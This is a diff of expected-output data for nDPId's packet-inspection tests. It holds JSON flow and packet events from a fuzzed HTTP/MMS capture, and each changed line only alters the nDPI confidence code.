-00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854535090,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854535090,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":76,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1031854535294} 00363{"packet_event_id":1,"packet_event_name":"packet","packet_id":76,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854535090,"pkt":"CAAgsl17AFCLk5N8CAAQAAAoKUtAAIAGc0qsFAMFrBQDDQotAFDk8WM7ym1yW1AQIamgfQAAYXRpb24v"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1031854543322,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854543322,"pkt":"AFCLk5N8CAAgsl17CABFAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} @@ -91,23 +91,23 @@ 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1031854557802,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854557802,"pkt":"CAAgsl17AFCLk5N8CABFAAAsNUtAAIAGZ0asFAMFrBQDDQouAFDlQWz1AAAAAGACIADjNgAAAgQFtAAA"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1031854557802,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854557802,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMxAAEAGF8WsFAMNrBQDBQBQCi7KxfhE5UFs9mASgyyW7gAAAgQFtA=="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1031854557802,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854557802,"pkt":"CAAgsl17AFCLk5N8CABFAAAoNktAAIAGZkqsFAMFrBQDDQouAFDlQWz2ysX4RVAQIjgPoAAAAgQFtAAA"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854557802,"flow_last_seen":1031854557802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854557802,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854557802,"flow_last_seen":1031854557802,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854557802,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":91,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1031854557899} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":91,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1031854557803,"pkt":"AFCLk5N8kgAgsl2cCAAlcwAoxM5AAEAGF8esFAMNrBQDBQB+Ci7KxfhF5UF0EVAQgyynkAAA"} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7580000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1031854557975,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854557975,"pkt":"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"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7580000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":93,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1031854557802,"flow_last_seen":1031854557975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3279,"flow_avg_l4_payload_len":468,"midstream":0,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7580000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":93,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1031854557802,"flow_last_seen":1031854557975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3279,"flow_avg_l4_payload_len":468,"midstream":0,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562320,"flow_last_seen":1031854562320,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562320,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1031854562320,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854562320,"pkt":"CAAgsl1rAFCLk5N8CABFAAAsPltAAIAGXkasFAMFrBQDDQovAFDlUj+sAAAAAGACIADqbQAAAgQFtAAA"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1031854562321,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854562321,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxNJAAEAGF7+sFAMNrBQDBQBQCi\/K2yc15VI\/rWASgyyVHwAAAgQFtA=="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1031854562321,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854562321,"pkt":"CAAgsl17AFCLk5N8CABFIAAoP0tAAIAGXUqsFAMFrBQDDQovAFDlUj+tytsnNlAQIjgN0QAAAgQFtAAA"} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7580000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854562321,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1031854562321,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854562321,"pkt":"CAAgsl17ACVzAJN8CABFAAXcQEtAAIAGVpasFAMFrBQDDSVzAFDlUj+tytsnNlAQInStCAAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvES4xDQpIbnN0OiAxNzIuMjAuMy4xMw0KT3B0OiAiaHR0cDovL3d3dy53My5vcmcvMTk5OS8wNi8yNC1DQ1BQZXhjaGFuZ2UiOyBucz01Ng0KQ29sdGVudC1UeXBlOiBhcHBsaWNhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpBY2NlcHQ6INtwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuDQpVc2VyLEFnZW50OiBTb255RXJpY3Nzb25UNjgvUjIwMUENCEFjY2VwdC1DaGFyc2V0OiAqDQo1Ni1Qcm9maWxlLURpZmYtMTogPD94bWwgdmVyc2lvbj0lcwAwIj8+PHpkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YSVzAHMjInhtbG5zOnByZj0iaHR0cDovL3d3VC53YXBmb291bS5vcmcvVUFQbk9GL2NjcHBzY2hlbWEtMTk5OTEwMTQjIj48IS0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IERlZmF1bHQgZGVzY3JpcHRpb34gb2YgcHJvcGVydGllcyAtLT48cmRmOkRlc2NyaXB0aW9uPjxwcmY6Q2NwcEFjY2VwdD48cmRmOkJhZz48cmRmOmxpPmFwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2U8L3JkZjpsaT48L3JkRzpCYWc+PC9wcmY6Q2NwcEFjY2VwdD5XL3JkZjpEZXNjcmlwdGlvbj48L3JkZjpSREY+DQo1Ni1Qcm9maWxlLURpZmYtMjogPD94bWwgdmVyc2lvbj0iMS4wIj8+PHJkZjpSREYgcG18bnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjInhtbLVzOnByZj0iaHR0cDovL3d3dy53YXBmb3J1bS5vcmcvVUFQUk9GL2NjcHBzY2hlbWEtMTk5OTEwMDQjIj48IS0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IERlZmF1bHQgZGVzY3JpcHRpb24gb2YgcHJvcGVydGllcyAtLT58ckhmOkRlc2NyaXB0aW9uPjxwcmY6Q2NwcEFjY2VwdC1DaGFyc2V0PjxyZGY6QmFnPjxyZGY6bGk+KjwvcmRmOmxpPjwvcmRmOkJhZz48L3ByZjpDY3BwQWNjZXB0LUNoYXJzZXQ+PC9yZGY6RGVzY3JpcHRpb24+PC9yZGY6UkRGPg0KNTYtUHJvZmlsZS1EaWZmLTM6IDw\/eG1sIHZlcnNpb249IjEuMCI\/PjxyZGY6UkRGIHhtbG5zOnJkZj1MaHR0cDovL3d3dy53My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4LW5zIyJ4bWxuczpwcmY9Imh0dHA6L9x3d3cud2FwZm9CdW0ub3JnL1VBUFJPRi9jY3Bwc2NoZW1hLTE5OTkxMDE0IyI+PCEtLSBicm93c2VyIHZlbmRvciBzaXRlOiBEZWZhdWx0IGRlc2NyaXB0aW9uIG9mIHByb3BlcnRpZXMxLS0+PHJkZk5EZXNjcmlwdGlvbj48cHJmOkNjcHBB9mNlcHQtTGFuZ3VhZ2U+PHJkZjpTZXE+PHJkZjpsaT5lbjwvcmRiOmxpPjwvcmRmOlNlcT48L3ByZjpDY3BwQWNjZXB0LUxhbmd1YWdlPjwvcmRmOkRlc2NyaXB0OG9uPjwvcmRmOlJERj4NCjU2LVByb2ZpbGUJICJodHRwOi8vd2FwLnNvbnllcmljc3Nvbm1vYmlsZS5jb20vVUFwcm9mL1Q2OFI="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7580000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854562321,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7580000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854562321,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854562401,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1031854562401,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":39,"thread_ts_msec":1031854562401,"pkt":"AFCLk5N8CAAgsl17CABFAAA7xNRAAEAGFzKsFAINrBQDBQBQCi\/K2yc25VJHCFAYgyz\/yAAASFRUUC8xLjEgMjAwIE9LDQpTZXN2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0eW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCnRvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE4OjE2OjAyIEdNVA0KDQo="} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854562401,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854562401,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1031854562488,"pkt":"AHWLk5N8CAAgsl17CABFAAAwxNVAAEAGF7isFAMNrBQDBc\/JAFDK5CpLAAAAAHACgyzcpwAAAQEEAgIEBbQ="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -115,7 +115,7 @@ 